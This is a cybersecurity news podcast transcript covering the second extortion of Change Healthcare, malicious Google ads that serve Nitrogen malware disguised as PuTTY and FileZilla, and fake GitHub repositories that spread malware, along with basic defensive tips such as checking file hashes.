The Daily Decrypt
Change Healthcare Extorted Again, Malvertising Targets IT, GitHub Scams on Developers: Navigating Cybersecurity Minefields

Today we unravel the second ransomware extortion of Change Healthcare by RansomHub, the cunning malvertising campaign targeting IT pros with malware-laden ads for PuTTY and FileZilla, and the deceptive tactics on GitHub fooling developers into downloading malware. Discover protective strategies and engage with expert insights on bolstering defenses against these evolving cyber threats.

Original URLs:

Follow us on Instagram:

Thanks to Jered Jones for providing the music for this episode.

Logo Design by

Tags: cybersecurity, ransomware, malvertising, GitHub scams, Change Healthcare, IT professionals, data protection, cybercrime, malware, software development

Search Phrases:

  • How to protect against ransomware attacks
  • Strategies to combat malvertising campaigns
  • Tips for IT professionals on avoiding malicious ads
  • Safeguarding software development from GitHub scams
  • Change Healthcare ransomware extortion case study
  • Cybersecurity advice for IT administrators
  • Dealing with malware in system utilities ads
  • Best practices for data protection in healthcare
  • Understanding cybercrime tactics on GitHub
  • Preventing repeated ransomware extortions


Transition (Long) 2

Welcome back to the Daily Decrypt.

Change Healthcare falls victim to a second ransomware extortion in just a month, now at the hands of the Emergent Ransom Hub Group, wielding over 4 terabytes of sensitive data stolen in the February 2024 cyberattack. Which comes as a result from the Black Cat Exit Scam.

Next, we’re turning over to a new malvertising campaign where searching for essential utilities for IT professionals like Putty and Filezilla leads to malware laden ads, and you all know what I’m going to say about this. Don’t click Google Ads. And finally, GitHub becomes a battlefield as cybercriminals exploit its search functionality to trick developers into downloading repositories full of malware. How can developers ensure the repositories they download from GitHub are safe and not just traps set by cybercriminals?

All right, so at the end of February of this year, you may remember that Change Healthcare, which is a subsidiary of UnitedHealthcare, was the victim of a ransomware attack by

the notorious and since disbanded ransomware group named Black Cat. Well, Change Healthcare finds itself in the crosshairs of a ransomware extortion scheme for the second time in just over a month, coming from a new ransomware group called Ransom Hub. There hasn’t been a second attack.

But this is believed to be a result of the exit scam that Black Cat pulled,

where they kept all of the ransom payment that Change Healthcare had made.

Allegedly, Optum, which is a subsidiary of Change Healthcare, paid Black Cat 22 million in ransom after the attack. Black Cat then pulled an apparent exit scam and disappeared without paying the affiliate who carried out the attack.

And according to Qualys Cyber Threat Director Ken Dunham, it’s not uncommon for

companies that give in and pay these ransoms

to quickly become additional targets or soft targets where their information is extorted again and again and again. Paying and giving into these ransomware artists might seem like a quick fix to your problems, but once you’ve proven that you will and can pay, they’re gonna come after you again. The data doesn’t just disappear or get deleted.

It’s very valuable, and in this case it’s worth 22 million dollars, so even if the attackers say they’re gonna delete it, maybe they won’t and maybe they’ll come hit you again.

So even though Black Cat has disbanded, whether or not they were taken down by the FBI or performed an exit scam, The data that they pillaged from Change Healthcare is now in the hands, or supposedly in the hands, of a group called Ransomhub, which is extorting Change Healthcare all over again.

IT professionals have found themselves at the crosshairs of an ongoing malvertising campaign. These attackers are using malicious Google Ads to disguise malware as popular system utilities, like Putty, which is a free SSH IntelNet client. And FileZilla, which is a FTP application. This research comes from Malwarebytes researcher Jerome Segura,

and he points out that even after alerting Google about these malicious ads, the campaign continues unabated. This sophisticated scheme begins when IT administrators search for these utilities on Google. The top search results, or sponsored ads, lead them through a series of cloaking pages.

These pages are designed to filter out non target traffic such as bots or security researchers, directing only potential victims to imitation sites. Unwittingly, when these IT administrators download what they believe to be legitimate software, they instead receive nitrogen malware, which is a dangerous software for cybercriminals, enabling them to infiltrate private networks or steal data, deploy ransomware attacks, and was used by the notorious Black Cat from the previous story.

The method of infiltration is known as DLL sideloading, which involves the malware masquerading as a legitimate and signed executable to launch a DLL, thereby avoiding detection.

So what this essentially means is these IT professionals are probably getting the tool, FileZilla, Putty, that they’re looking for, The functionality might remain exactly the same, which only serves to benefit the attackers because once the IT professionals download the software, there’s no indicators that it’s incorrect or fake, but this software such as Putty or FileZilla will then launch a separate DLL, which is just an executable

that contains the malware. So one way you can prevent this as someone downloading software from the web, is to find what’s called an MD5 hash, which is essentially a signature of sorts that verifies the integrity of the file you’ve downloaded. Now, hashing isn’t necessarily something we need to get into, Right now on this podcast, but all you need to know is it’s sort of like math where you multiply the data from within this piece of software or do algebra or something to create this long string of characters.

that can’t be replicated if the files have been altered. So as soon as the files are altered, the mathematical equation puts out a different set of characters, right? So the creators of the software release this hash, they display it on their website, and then when you download the software, you run the same algorithm against that software to see if those two hashes match.

Now I personally am guilty of Not always checking the hash for softwares. And I know a lot of other IT professionals are guilty of that as well, but it’s time to set up a new good habit and consistently check these hashes, maybe even develop a web scraper that will go grab the hash and also run the software through it, comparing it, reducing the amount of work you have to do on the other end,

but in summary, as I always say, do not click Google ads unless you absolutely have to, unless the thing you’re searching for down below.

Unless the thing you’re specifically searching for is not in the search results below, and is only present in the advertisement, which will probably only be for things like thedailydecrypt. com, where I haven’t been around long enough to boost my search result ranking naturally, so eventually maybe I’ll start buying ad space, trying to get to people who are looking for the content that we’re providing.

But if you’re going to download some software, there’s no need to click the ads, especially something as popular as FileZilla or PuTTY, VS Code, whatever you’re trying to download, go find it in the search results. Do not click the ad.

And in a similar vein, let’s talk about a scam on GitHub that’s fooling developers into downloading dangerous malware. Cybercriminals are exploiting GitHub’s search features, luring users into downloading fake yet seemingly popular repositories.

This scheme has been identified to distribute malware hidden within Microsoft Visual Studio Code project files, which are cunningly designed to fetch further malicious payloads from remote URLs, as reported by checkmarks.

So the attackers are mimicking popular repositories and employing automated updates and fake stars to climb GitHub’s search rankings.

So unlike Google, I don’t believe there are ads you can buy in GitHub search to boost your search rankings. So attackers are becoming a little more creative. Making the repository look like it’s consistently updated, helps boost the search rankings, and then naming the repositories, things that developers are constantly searching for will also help boost its rankings in its SEO.

So since many of these repositories are disguised legitimate projects,

it can be pretty tricky to identify them, but among the discoveries, some repositories were found downloading an encrypted file named feedbackapi. exe.

which is an executable and is notably large at 750 megabytes. This executable is designed to bypass antivirus detection and deploy malware, similar to the Kizetsu Clipper, a notorious tool known for hijacking cryptocurrency transactions.

And unlike softwares downloaded from the internet by clicking on Google ads in the previous story, there may or may not be hashes for these repositories. Most likely not. Sometimes if they’re an executable or a package, they’ll provide a hash. But if you’re on the GitHub repository, you think it’s legit, they might list the hash, but that’s just the hash to their malware, giving you a false sense of security, just be extra vigilant when you’re downloading anything to your computer, especially open source things that are generally found on GitHub,

it can’t be that hard to create. A thousand GitHub accounts, or maybe even you can buy them online. And that immediately gives your repo a thousand stars, making it look legitimate.

So if you’re looking for a tool, it’s best to find it on the web within, from within a reputable website.

GitHub search feature is not the most reliable.

And that’s all I’ve got for you today. Thanks so much for tuning in.

Today I’ll be traveling to Florida to Participate in the Hackspace conference where I’m really excited to learn a little bit more about how cybersecurity and satellites and other spacecraft intertwine.

I’ll also be meeting up with dogespan where we’ll hopefully do a joint episode, our first ever one in person. So be sure to tune in tomorrow for that episode.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.